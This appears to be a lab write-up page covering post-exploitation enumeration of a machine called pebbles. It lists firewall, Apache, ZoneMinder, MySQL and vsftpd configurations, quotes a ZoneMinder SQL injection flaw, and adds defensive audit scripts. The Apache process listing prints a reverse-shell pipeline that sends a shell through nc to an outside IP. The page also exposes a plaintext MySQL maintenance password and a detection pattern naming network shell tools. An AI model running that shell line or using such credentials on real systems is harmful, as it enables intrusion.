Beyond
This is the Beyond page, where additional post-exploitation enumeration and assessment are conducted as the root user after compromising the target system.
Firewall
root@pebbles:~# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT all -- anywhere anywhere ctstate NEW,RELATED,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:ftp
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh
ACCEPT tcp -- anywhere anywhere tcp dpt:http
ACCEPT tcp -- anywhere anywhere tcp dpt:3305
ACCEPT tcp -- anywhere anywhere tcp dpt:http-alt
ACCEPT icmp -- anywhere anywhere icmp echo-request
ACCEPT icmp -- anywhere anywhere icmp echo-reply
DROP all -- anywhere anywhere
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT tcp -- anywhere anywhere tcp dpt:ftp state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:ftp state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:ssh state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:http state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:http state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:3305 state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:3305 state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:http-alt state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:http-alt state NEW,ESTABLISHED
ACCEPT icmp -- anywhere anywhere icmp echo-request
ACCEPT icmp -- anywhere anywhere icmp echo-reply
DROP all -- anywhere anywhere
Heavily enforced firewall: both the INPUT and OUTPUT chains end in a catch-all DROP, so only ftp, ssh, http, 3305, http-alt and ICMP echo traffic is allowed through.
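To turn the listing above into a repeatable check rather than an eyeball assessment, the following script (an added example, not part of the original write-up) parses `iptables -L` output, lists the TCP destination ports each chain accepts, and confirms the chain ends in an unconditional DROP. It also counts ACCEPT rules that show no match text at all: `iptables -L` without `-v` hides the interface columns, so the first `ACCEPT all anywhere anywhere` line above is most likely a loopback rule, but the audit flags it as something to confirm with `iptables -L -v -n` rather than assuming. The embedded sample is an abridged copy of the page's listing (constructed for this example).

```python
import re
from typing import Dict

# Constructed sample: an abridged copy of the `iptables -L` listing above
# (OUTPUT keeps only one of its port rules), embedded so the check runs offline.
IPTABLES_SAMPLE = """\
Chain INPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT all -- anywhere anywhere ctstate NEW,RELATED,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:ftp
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh
ACCEPT tcp -- anywhere anywhere tcp dpt:http
ACCEPT tcp -- anywhere anywhere tcp dpt:3305
ACCEPT tcp -- anywhere anywhere tcp dpt:http-alt
ACCEPT icmp -- anywhere anywhere icmp echo-request
ACCEPT icmp -- anywhere anywhere icmp echo-reply
DROP all -- anywhere anywhere
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh state NEW,ESTABLISHED
DROP all -- anywhere anywhere
"""


def parse_chains(listing: str) -> Dict[str, dict]:
    """Turn `iptables -L` text into {chain: {"policy": ..., "rules": [...]}}.
    Each rule keeps its target, protocol and whatever match text follows the
    five fixed columns (target prot opt source destination)."""
    chains: Dict[str, dict] = {}
    current = None
    for raw in listing.splitlines():
        line = raw.strip()
        header = re.match(r"Chain (\S+) \(policy (\S+)\)", line)
        if header:
            current = header.group(1)
            chains[current] = {"policy": header.group(2), "rules": []}
            continue
        if not line or line.startswith("target ") or current is None:
            continue
        parts = line.split()
        chains[current]["rules"].append(
            {"target": parts[0], "prot": parts[1], "match": " ".join(parts[5:])})
    return chains


def assess(listing: str) -> Dict[str, dict]:
    """Summarise each chain: accepted TCP destination ports, whether the chain
    ends in a catch-all DROP, and how many ACCEPT rules show no match at all
    (interface-only rules look like this when -v is not used)."""
    report: Dict[str, dict] = {}
    for name, chain in parse_chains(listing).items():
        rules = chain["rules"]
        ports = []
        for rule in rules:
            if rule["target"] != "ACCEPT":
                continue
            port = re.search(r"dpt:(\S+)", rule["match"])
            if port:
                ports.append(port.group(1))
        terminal_drop = bool(rules) and rules[-1]["target"] == "DROP" and rules[-1]["match"] == ""
        unconditional = sum(1 for r in rules if r["target"] == "ACCEPT" and r["match"] == "")
        report[name] = {
            "policy": chain["policy"],
            "tcp_ports": ports,
            "terminal_drop": terminal_drop,
            "unconditional_accepts": unconditional,
            # Only true when nothing before the DROP could let unmatched traffic through.
            "effectively_closed": terminal_drop and unconditional == 0,
        }
    return report


if __name__ == "__main__":
    for chain, info in assess(IPTABLES_SAMPLE).items():
        print(f"{chain:8} policy={info['policy']:6} ports={info['tcp_ports']} "
              f"terminal_drop={info['terminal_drop']} unconditional_accepts={info['unconditional_accepts']}")
    print("Unconditional ACCEPTs need `iptables -L -v -n` to confirm they are interface-bound (e.g. lo).")
```

Feed it the real listing with `iptables -L | python3 fw_audit.py` after replacing the sample with `sys.stdin.read()`; the FORWARD chain is reported as not closed because it relies on policy alone and has no rules.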
apache
root@pebbles:~# systemctl status apache2.service
● apache2.service - LSB: Apache2 web server
Loaded: loaded (/etc/init.d/apache2; bad; vendor preset: enabled)
Drop-In: /lib/systemd/system/apache2.service.d
└─apache2-systemd.conf
Active: active (running) since Thu 2025-01-30 02:48:50 EST; 1 months 10 days
Docs: man:systemd-sysv-generator(8)
Process: 1007 ExecStart=/etc/init.d/apache2 start (code=exited, status=0/SUCCE
Tasks: 37
Memory: 64.7M
CPU: 7min 17.531s
CGroup: /system.slice/apache2.service
├─ 1287 /usr/sbin/apache2 -k start
├─ 1302 /usr/sbin/apache2 -k start
├─ 1304 /usr/sbin/apache2 -k start
├─ 1305 /usr/sbin/apache2 -k start
├─ 1306 /usr/sbin/apache2 -k start
├─ 2016 /usr/sbin/apache2 -k start
├─ 9167 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.
├─ 9171 bash -i
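The cgroup listing above shows PIDs 9167 and 9171, a `sh -c ... bash -i ... nc` pipeline and an interactive bash, hanging off apache2.service: that is the write-up's own shell, and it is exactly the kind of child a web server should never have. The following script (an added example, not part of the original page) parses the CGroup section of `systemctl status` output and flags any process whose binary is not the expected server executable, escalating when the command line is a shell, a network tool, or contains a mkfifo/`bash -i` pipeline. The sample lines are constructed from the listing above; the expected binary path is an assumption for Debian-style Apache.

```python
import os
import re
import sys
import subprocess
from typing import List, Dict

# Constructed sample: the CGroup block of the apache2.service status above.
CGROUP_SAMPLE = """\
CGroup: /system.slice/apache2.service
├─ 1287 /usr/sbin/apache2 -k start
├─ 1302 /usr/sbin/apache2 -k start
├─ 2016 /usr/sbin/apache2 -k start
├─ 9167 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.
├─ 9171 bash -i
"""

SHELLS = {"sh", "bash", "dash", "zsh"}
NET_TOOLS = {"nc", "netcat", "ncat", "socat"}
# Fragments that mark an interactive or piped shell rather than a one-off helper.
PIPELINE_MARKERS = re.compile(r"(bash -i|mkfifo|\bnc\b|\bsocat\b)")


def parse_cgroup_processes(text: str) -> List[Dict]:
    """Extract (pid, command line) pairs from systemctl's tree lines
    (handles both '├─ 1287 cmd' and '└─2152 cmd' spacing)."""
    procs = []
    for raw in text.splitlines():
        m = re.match(r"^[├└│─\s]*(\d+)\s+(.+)$", raw.strip())
        if m:
            procs.append({"pid": int(m.group(1)), "cmd": m.group(2)})
    return procs


def classify(cmd: str, expected_bin: str) -> str:
    """Return an empty string for the expected server binary, otherwise a reason."""
    argv0 = cmd.split()[0]
    if argv0 == expected_bin:
        return ""
    base = os.path.basename(argv0)
    if base in SHELLS:
        reason = "shell spawned under web server"
    elif base in NET_TOOLS:
        reason = "network tool spawned under web server"
    else:
        reason = "unexpected child binary"
    if PIPELINE_MARKERS.search(cmd):
        reason += "; reverse-shell pattern"
    return reason


def audit_cgroup(text: str, expected_bin: str = "/usr/sbin/apache2") -> List[Dict]:
    """List every process in the unit's cgroup that is not the expected binary."""
    findings = []
    for proc in parse_cgroup_processes(text):
        reason = classify(proc["cmd"], expected_bin)
        if reason:
            findings.append({**proc, "reason": reason})
    return findings


if __name__ == "__main__":
    text = CGROUP_SAMPLE
    if len(sys.argv) > 1:  # e.g. python3 cgroup_audit.py apache2.service on a live host
        text = subprocess.run(["systemctl", "status", sys.argv[1], "--no-pager"],
                              capture_output=True, text=True).stdout
    for f in audit_cgroup(text, sys.argv[2] if len(sys.argv) > 2 else "/usr/sbin/apache2"):
        print(f"PID {f['pid']}: {f['reason']} :: {f['cmd']}")
```

Run against a live unit it reads `systemctl status <unit> --no-pager`; the same logic applies to zoneminder.service or mysql.service by passing their expected binary as the second argument, and it is cheap enough to schedule from cron or a monitoring agent.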
root@pebbles:~# cat /etc/apache2/ports.conf
# If you just change the port or add more ports here, you will likely also
# have to change the VirtualHost statement in
# /etc/apache2/sites-enabled/000-default.conf
Listen 3305
<IfModule ssl_module>
Listen 443
</IfModule>
<IfModule mod_gnutls.c>
Listen 443
</IfModule>
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
Listen 80
Listen 8080
root@pebbles:~# cat /etc/apache2/apache2.conf | grep -v '^[#/]'
Mutex file:${APACHE_LOCK_DIR} default
PidFile ${APACHE_PID_FILE}
Timeout 300
KeepAlive On
MaxKeepAliveRequests 100
KeepAliveTimeout 5
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
HostnameLookups Off
ErrorLog ${APACHE_LOG_DIR}/error.log
LogLevel warn
IncludeOptional mods-enabled/*.load
IncludeOptional mods-enabled/*.conf
Include ports.conf
<Directory />
Options FollowSymLinks
AllowOverride None
Require all denied
</Directory>
<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>
<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride None
Require all granted
</Directory>
AccessFileName .htaccess
<FilesMatch "^\.ht">
Require all denied
</FilesMatch>
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
IncludeOptional conf-enabled/*.conf
IncludeOptional sites-enabled/*.conf
root@pebbles:~# cat /etc/apache2/sites-enabled/000-default.conf
<VirtualHost *:3305>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/auth
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:8080>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/tomcat
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
N/A
zoneminder
root@pebbles:~# systemctl status zoneminder.service
● zoneminder.service - ZoneMinder CCTV recording and surveillance system
Loaded: loaded (/lib/systemd/system/zoneminder.service; enabled; vendor prese
Active: active (running) since Tue 2025-03-11 20:23:32 EDT; 1h 21min ago
Process: 2060 ExecStop=/usr/bin/zmpkg.pl stop (code=exited, status=0/SUCCESS)
Process: 2100 ExecStart=/usr/bin/zmpkg.pl start (code=exited, status=0/SUCCESS
Main PID: 2118 (zmdc.pl)
Tasks: 4
Memory: 54.0M
CPU: 1.968s
CGroup: /system.slice/zoneminder.service
├─2118 /usr/bin/perl -wT /usr/bin/zmdc.pl startup
├─2142 /usr/bin/perl -wT /usr/bin/zmfilter.pl
├─2147 /usr/bin/perl -wT /usr/bin/zmaudit.pl -c
└─2152 /usr/bin/perl -wT /usr/bin/zmwatch.pl
/lib/systemd/system/zoneminder.service
root@pebbles:~# cat /lib/systemd/system/zoneminder.service
# ZoneMinder systemd unit file
# This file is intended to work with Debian distributions
[Unit]
Description=ZoneMinder CCTV recording and surveillance system
After=network.target mysql.service
Wants=mysql.service
[Service]
#User=www-data
Type=forking
ExecStart=/usr/bin/zmpkg.pl start
ExecReload=/usr/bin/zmpkg.pl restart
ExecStop=/usr/bin/zmpkg.pl stop
PIDFile=/var/run/zm/zm.pid
Restart=on-abnormal
[Install]
WantedBy=multi-user.target
mysql.service
mysql
root@pebbles:~# systemctl status mysql.service
● mysql.service - MySQL Community Server
Loaded: loaded (/lib/systemd/system/mysql.service; enabled; vendor preset: en
Active: active (running) since Thu 2025-01-30 02:48:51 EST; 1 months 10 days
Process: 1156 ExecStartPost=/usr/share/mysql/mysql-systemd-start post (code=ex
Process: 1008 ExecStartPre=/usr/share/mysql/mysql-systemd-start pre (code=exit
Main PID: 1155 (mysqld)
Tasks: 39
Memory: 237.0M
CPU: 1.971s
CGroup: /system.slice/mysql.service
└─1155 /usr/sbin/mysqld
root@pebbles:~# cat /lib/systemd/system/mysql.service
# MySQL systemd service file
[Unit]
Description=MySQL Community Server
After=network.target
[Install]
WantedBy=multi-user.target
[Service]
User=root
Group=root
PermissionsStartOnly=true
ExecStartPre=/usr/share/mysql/mysql-systemd-start pre
ExecStart=/usr/sbin/mysqld
ExecStartPost=/usr/share/mysql/mysql-systemd-start post
TimeoutSec=600
Restart=on-failure
RuntimeDirectory=mysqld
RuntimeDirectoryMode=755
The User and Group attributes are set to root.
root@pebbles:~# cat /etc/mysql/debian.cnf
# Automatically generated for Debian scripts. DO NOT TOUCH!
[client]
host = localhost
user = debian-sys-maint
password = IaLWCaaBsNeSbJD3
socket = /var/run/mysqld/mysqld.sock
[mysql_upgrade]
host = localhost
user = debian-sys-maint
password = IaLWCaaBsNeSbJD3
socket = /var/run/mysqld/mysqld.sock
root@pebbles:~# cat /etc/mysql/mysql.cnf | grep -v '^[#/]'
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mysql.conf.d/
root@pebbles:~# cat /etc/mysql/my.cnf | grep -v '^[#/]'
[mysqld_safe]
socket = /var/run/mysqld/mysqld.sock
nice = 0
[mysqld]
user = root
pid-file = /var/run/mysqld/mysqld.pid
socket = /var/run/mysqld/mysqld.sock
port = 3306
basedir = /usr
datadir = /var/lib/mysql
tmpdir = /tmp
lc-messages-dir = /usr/share/mysql
skip-external-locking
bind-address = 127.0.0.1
key_buffer_size = 16M
max_allowed_packet = 16M
thread_stack = 192K
thread_cache_size = 8
myisam-recover-options = BACKUP
query_cache_limit = 1M
query_cache_size = 16M
log_error = /var/log/mysql/error.log
expire_logs_days = 10
max_binlog_size = 100M
sql_mode = NO_ENGINE_SUBSTITUTION
secure-file-priv=""
root@pebbles:~# cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v '^[#]'
[mysqld_safe]
socket = /var/run/mysqld/mysqld.sock
nice = 0
[mysqld]
user = root3
pid-file = /var/run/mysqld/mysqld.pid
socket = /var/run/mysqld/mysqld.sock
port = 3306
basedir = /usr
datadir = /var/lib/mysql
tmpdir = /tmp
lc-messages-dir = /usr/share/mysql
skip-external-locking
bind-address = 127.0.0.1
key_buffer_size = 16M
max_allowed_packet = 16M
thread_stack = 192K
thread_cache_size = 8
myisam-recover-options = BACKUP
query_cache_limit = 1M
query_cache_size = 16M
log_error = /var/log/mysql/error.log
expire_logs_days = 10
max_binlog_size = 100M
sql_mode = NO_ENGINE_SUBSTITUTION
secure-file-priv=""
N/A
vsftpd
root@pebbles:~# systemctl status vsftpd.service
● vsftpd.service - vsftpd FTP server
Loaded: loaded (/lib/systemd/system/vsftpd.service; enabled; vendor preset: e
Active: active (running) since Thu 2025-01-30 02:48:49 EST; 1 months 10 days
Process: 1065 ExecStartPre=/bin/mkdir -p /var/run/vsftpd/empty (code=exited, s
Main PID: 1127 (vsftpd)
Tasks: 1
Memory: 540.0K
CPU: 1ms
CGroup: /system.slice/vsftpd.service
└─1127 /usr/sbin/vsftpd /etc/vsftpd.conf
root@pebbles:~# cat /lib/systemd/system/vsftpd.service
[Unit]
Description=vsftpd FTP server
After=network.target
[Service]
Type=simple
ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty
[Install]
WantedBy=multi-user.target
/etc/vsftpd.conf
root@pebbles:~# cat /etc/vsftpd.conf | grep -v '^[#/]'
listen=NO
listen_ipv6=YES
anonymous_enable=NO
local_enable=YES
dirmessage_enable=YES
use_localtime=YES
xferlog_enable=YES
connect_from_port_20=YES
secure_chroot_dir=/var/run/vsftpd/empty
pam_service_name=vsftpd
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
ssl_enable=NO
N/A
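The MySQL and vsftpd listings above each carry weak settings worth checking mechanically: mysqld runs as root (`User=root` in the unit and `user = root` in the mysqld section), `secure-file-priv=""` removes the path restriction on LOAD DATA and SELECT ... INTO OUTFILE, and vsftpd has `ssl_enable=NO` with local logins allowed. The following auditor (an added example, not part of the original page) parses these key=value formats with one small INI reader, covering the systemd unit, the mysqld section and vsftpd.conf, and reports each finding next to the recommended value. The samples are constructed abridgements of the listings above; the MySQL key normalisation relies on MySQL accepting `-` and `_` interchangeably in option names.

```python
from typing import Dict, List, Tuple

# Constructed samples abridged from the listings above.
MYSQLD_CNF = """\
[mysqld]
user = root
bind-address = 127.0.0.1
secure-file-priv=""
log_error = /var/log/mysql/error.log
"""
MYSQL_UNIT = """\
[Unit]
Description=MySQL Community Server
[Service]
User=root
Group=root
ExecStart=/usr/sbin/mysqld
"""
VSFTPD_CONF = """\
listen=NO
listen_ipv6=YES
anonymous_enable=NO
local_enable=YES
ssl_enable=NO
"""

Finding = Tuple[str, str, str]  # (severity, component, message)


def parse_ini(text: str) -> Dict[str, Dict[str, str]]:
    """Parse mysql/systemd/vsftpd style key=value text into {section: {key: value}}.
    Keys are lower-cased with '-' folded to '_' (MySQL accepts both spellings);
    bare flags such as skip-external-locking get the value ''. Comments and
    !includedir lines are ignored; included files must be parsed separately."""
    sections: Dict[str, Dict[str, str]] = {"": {}}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;!":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower().replace("-", "_")] = value.strip().strip('"')
    return sections


def audit_mysqld(cnf: str, unit: str) -> List[Finding]:
    out: List[Finding] = []
    d = parse_ini(cnf).get("mysqld", {})
    s = parse_ini(unit).get("Service", {})
    if d.get("user") == "root" or s.get("user") == "root":
        out.append(("HIGH", "mysqld",
                    "daemon runs as root; set user = mysql in the config and User=mysql/Group=mysql in the unit"))
    # Only an explicit empty value is unrestricted; an absent key keeps the package default directory.
    if "secure_file_priv" in d and d["secure_file_priv"] == "":
        out.append(("HIGH", "mysqld",
                    'secure-file-priv="" allows LOAD DATA / SELECT ... INTO OUTFILE on any path; '
                    "point it at a dedicated directory or set secure-file-priv=NULL"))
    if d.get("bind_address", "0.0.0.0") not in ("127.0.0.1", "::1", "localhost"):
        out.append(("MEDIUM", "mysqld", "listens on a non-loopback address; bind to 127.0.0.1 unless remote access is required"))
    return out


def audit_vsftpd(conf: str) -> List[Finding]:
    out: List[Finding] = []
    c = parse_ini(conf).get("", {})
    if c.get("anonymous_enable", "YES").upper() == "YES":  # upstream default is YES
        out.append(("HIGH", "vsftpd", "anonymous FTP enabled"))
    if c.get("ssl_enable", "NO").upper() != "YES":
        out.append(("MEDIUM", "vsftpd",
                    "ssl_enable=NO: logins and transfers are cleartext; set ssl_enable=YES with "
                    "force_local_logins_ssl=YES and force_local_data_ssl=YES"))
    if c.get("local_enable", "NO").upper() == "YES" and c.get("chroot_local_user", "NO").upper() != "YES":
        out.append(("MEDIUM", "vsftpd", "local users are not chrooted; set chroot_local_user=YES"))
    return out


if __name__ == "__main__":
    for sev, comp, msg in audit_mysqld(MYSQLD_CNF, MYSQL_UNIT) + audit_vsftpd(VSFTPD_CONF):
        print(f"[{sev}] {comp}: {msg}")
```

On a live host, read the real files (`/etc/mysql/mysql.conf.d/mysqld.cnf`, `/lib/systemd/system/mysql.service`, `/etc/vsftpd.conf`) in place of the samples. The script does not check file modes, so the plaintext maintenance credentials in `/etc/mysql/debian.cnf` still need a separate `stat -c '%a %U' /etc/mysql/debian.cnf` to confirm the file is 0600 and root-owned.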
SQL Injection
The /zoneminder/www/ajax/log.php file contains the SQL injection vulnerability.
root@pebbles:/usr/share/zoneminder/www# cat ./ajax/log.php
<?php
[...REDACTED...]
$limit = isset($_POST['limit'])?$_POST['limit']:100;
$sql = 'SELECT * FROM Logs';
if ( count($where) )
$sql.= ' WHERE '.join( ' AND ', $where );
$sql .= " order by ".$sortField." ".$sortOrder." limit ".$limit;
$logs = array();
foreach ( dbFetchAll( $sql, NULL, $values ) as $log ) {
[...REDACTED...]
}
The $limit variable is taken directly from $_POST['limit'] without validation and concatenated into the query string, making it vulnerable to SQL injection.
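To show the defect and its fix side by side, the following Python reimplementation (an added example, not ZoneMinder's code or its patch) mirrors the PHP query construction above in `build_query_vulnerable`, then builds the same query safely: `limit` must be a positive integer and is capped, the sort field and order are checked against whitelists, WHERE values and the limit are bound as parameters, and the result is run against a minimal in-memory SQLite `Logs` table constructed for the example. Column names and log rows are assumptions standing in for ZoneMinder's schema.

```python
import re
import sqlite3
from typing import List, Sequence, Tuple

# Constructed stand-in for ZoneMinder's Logs table; only a few columns are modelled.
ALLOWED_COLUMNS = {"Id", "TimeKey", "Component", "Level", "Message"}
ALLOWED_SORT_ORDERS = {"ASC", "DESC"}
MAX_LIMIT = 1000


def build_query_vulnerable(where: List[str], sort_field: str, sort_order: str, limit) -> str:
    """Same shape as the PHP above: every caller-supplied piece is concatenated in."""
    sql = "SELECT * FROM Logs"
    if where:
        sql += " WHERE " + " AND ".join(where)
    sql += " order by " + sort_field + " " + sort_order + " limit " + str(limit)
    return sql


def build_query_safe(where: Sequence[Tuple[str, str]], sort_field: str,
                     sort_order: str, limit) -> Tuple[str, list]:
    """Whitelist identifiers, validate the limit, and bind values as parameters.
    `where` is a list of (column, value) pairs so only the column name is
    interpolated, and only after it passes the whitelist."""
    for column, _ in where:
        if column not in ALLOWED_COLUMNS:
            raise ValueError(f"unknown column {column!r}")
    if sort_field not in ALLOWED_COLUMNS:
        raise ValueError(f"unknown sort field {sort_field!r}")
    sort_order = str(sort_order).upper()
    if sort_order not in ALLOWED_SORT_ORDERS:
        raise ValueError(f"bad sort order {sort_order!r}")
    if not re.fullmatch(r"[1-9]\d*", str(limit)):
        raise ValueError(f"limit must be a positive integer, got {limit!r}")
    bounded_limit = min(int(limit), MAX_LIMIT)

    sql = "SELECT * FROM Logs"
    params: list = []
    if where:
        sql += " WHERE " + " AND ".join(f"{col} = ?" for col, _ in where)
        params.extend(value for _, value in where)
    sql += f" ORDER BY {sort_field} {sort_order} LIMIT ?"
    params.append(bounded_limit)
    return sql, params


def make_demo_db() -> sqlite3.Connection:
    """In-memory table with a few constructed log rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Logs (Id INTEGER PRIMARY KEY, TimeKey REAL, "
                 "Component TEXT, Level TEXT, Message TEXT)")
    conn.executemany(
        "INSERT INTO Logs (TimeKey, Component, Level, Message) VALUES (?, ?, ?, ?)",
        [(1.0, "zmdc", "INF", "startup"),
         (2.0, "zmwatch", "ERR", "capture daemon not running"),
         (3.0, "zmfilter", "INF", "filter run")])
    return conn


def fetch_logs(conn: sqlite3.Connection, where, sort_field, sort_order, limit) -> list:
    sql, params = build_query_safe(where, sort_field, sort_order, limit)
    return conn.execute(sql, params).fetchall()


if __name__ == "__main__":
    tampered = "100 -- injected"
    print("vulnerable:", build_query_vulnerable([], "Id", "DESC", tampered))
    try:
        build_query_safe([], "Id", "DESC", tampered)
    except ValueError as err:
        print("safe:", err)
    conn = make_demo_db()
    print(fetch_logs(conn, [("Level", "ERR")], "TimeKey", "DESC", "10"))
```

The vulnerable builder embeds the tampered limit verbatim, which is the page's point; the safe builder rejects it before any SQL is assembled. The same shape applies in PHP with PDO or mysqli prepared statements: cast or regex-check `$_POST['limit']`, compare `$sortField` and `$sortOrder` against fixed arrays, and bind the WHERE values instead of interpolating them.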